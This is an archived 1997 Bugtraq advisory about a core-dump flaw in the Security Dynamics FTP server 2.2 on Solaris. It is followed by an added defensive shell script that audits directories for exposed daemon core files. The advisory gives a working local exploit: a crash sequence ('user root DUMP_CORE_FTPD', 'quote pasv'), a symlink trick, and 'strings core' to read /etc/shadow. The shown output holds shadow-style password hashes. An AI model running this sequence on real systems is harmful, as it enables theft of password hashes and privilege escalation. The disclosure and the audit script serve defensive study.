Core bug in the Security Dynamics ftp server

Summary
Description: typical core file bug
Author: sp00n <sp00n@COUPLER.300BAUD.COM>
Compromise: root (local)
Vulnerable systems: those running the Security Dynamics FTP server (Version 2.2), which is available at least for Solaris boxes.
Date: 12 November 1997
Details

Date: Wed, 12 Nov 1997 11:56:29 -0500
From: sp00n <sp00n@COUPLER.300BAUD.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: Bug In Security Dynamics' FTP server (Version 2.2)

Hi,

This bug is similar to the Solaris and other ftp core dump bugs, slightly
different though. BTW the machine is a SPARC 20 running 2.5. You can link
files and clobber them with a core to annoy your local sysadmin or, even
better, get /etc/shadow, you get the point... anyways

220 cornholio Security Dynamics' FTP server (Version 2.2) ready.
Name (.:joeuser): joeuser
331 Password required for mpotter.
Password:
230 User joeuser logged in.
ftp> cd /tmp
250 CWD command successful.
ftp> user root DUMP_CORE_FTPD
331 Password required for root.
530 Login incorrect.
Login failed.
ftp> quote pasv
421 Service not available, remote server has closed connection
ftp> quit
$ ls -la core
-rw-r-----   1 root     network   264656 Nov 12 11:14 core
At least it doesn't dump 666 like Solaris's in.ftpd :) But I can't read it :(


Not too useful, you say? Welp, prior to dumping the core you should link it
to ps_data or something like that, then you will get this:

lrwxrwxrwx   1 joeuser  network        7 Nov 12 11:07 core -> ps_data
-rw-rw-r--   1 root     sys       264656 Nov 12 11:07 ps_data

$file ps_data
ps_data:        ELF 32-bit MSB core file SPARC Version 1, from '_sdi_ftpd'

$strings core | more

noaccess:*LK*:6445::::::
sp00n:o.IZGdC5eBTtKY:10175:7:28::::
root:aiqzotPNtTsI:9988::::::
user2:U6d5srjcJi/KU:9952::::::
joeuser:ktxVoVPQVIgc.:10175:7:28::::
root::0:root
other::1:
bin::2:root,daemon
sys::3:root,bin,adm
adm::4:root,daemon
uucp::5:root

Date: Wed, 12 Nov 1997 16:20:11 -0500
From: sp00n 
To: BUGTRAQ@NETSPACE.ORG
Subject: correction to: Bug In Security Dynamics' FTP server (Version 2.2)

Hi,

Earlier I said:

$ ls -la core
-rw-r-----   1 root     network   264656 Nov 12 11:14 core
At least it doesn't dump 666 like Solaris's in.ftpd :) But I can't read it :(
----------------earlier---------

I can read it
$id
uid=779(joeuser) gid=1500(network)

It dumps as root and with the GID of the user, SO I CAN do a
"strings core | more" w/o having to link it to ps_data or some root-owned
file with o+r perms.

Matt
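A defender's check for the exposure the two messages describe: the daemon's core lands owned by root but with the connecting user's GID and a group-readable mode, so any member of that group can read the daemon's memory. This is an added example in POSIX shell, not code from the original post; the function names, the mode and shadow-record heuristics, and the constructed sample file are assumptions made for the illustration.

```shell
#!/bin/sh
# Added example, not code from the original post: audit a directory
# for daemon cores that leak the way the _sdi_ftpd dump above does:
# owned by root but carrying the connecting user's GID and a group-
# readable mode, so anyone in that group can read the daemon's memory.

# Succeed if an ls -l mode string such as "-rw-r-----" grants read
# to group (5th character) or other (8th character).
core_readable_by_others() {
    case "$1" in
        ????r*|???????r*) return 0 ;;
        *) return 1 ;;
    esac
}

# Count shadow(4)-format records (login name, hash, then seven numeric
# or empty fields) among the printable strings in FILE; tr stands in
# for strings(1) so only POSIX tools are needed.
count_shadow_records() {
    LC_ALL=C tr -c '[:print:]\n' '\n' < "$1" \
      | LC_ALL=C grep -c -E '^[A-Za-z_][A-Za-z0-9_.-]*:[^:]*(:[0-9]*){7}$' || true
}

# Report every core file under DIR that is owned by root yet readable
# beyond its owner, with the number of shadow records it carries.
audit_cores() {
    dir=$1
    for f in "$dir"/core "$dir"/core.*; do
        [ -f "$f" ] || continue
        set -- $(ls -ld "$f")           # mode links owner group ...
        if [ "$3" = root ] && core_readable_by_others "$1"; then
            echo "EXPOSED $f mode=$1 shadow_records=$(count_shadow_records "$f")"
        fi
    done
}

# Constructed stand-in for a core: binary noise around text the daemon
# had read from /etc/shadow and /etc/group (fake hashes, not real ones).
make_sample_core() {
    f=$(mktemp)
    printf '\177ELF\001\002\000\000garbage\000noaccess:*LK*:6445::::::\n' > "$f"
    printf 'joeuser:FAKEHASHxxxxx:10175:7:28::::\nroot:FAKEHASHyyyyy:9988::::::\n' >> "$f"
    printf 'root::0:root\nsys::3:root,bin,adm\n\000\000tail\000' >> "$f"   # group(4) lines: 4 fields, not counted
    echo "$f"
}

if [ $# -gt 0 ]; then audit_cores "$1"; fi    # usage: sh audit_cores.sh /tmp
```

Run it against the directory an FTP user can chdir into (here /tmp); any EXPOSED line with a non-zero shadow_records count is a core that should be removed and a daemon whose core dumps should be disabled or confined.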

This page is part of Fyodor's exploit world.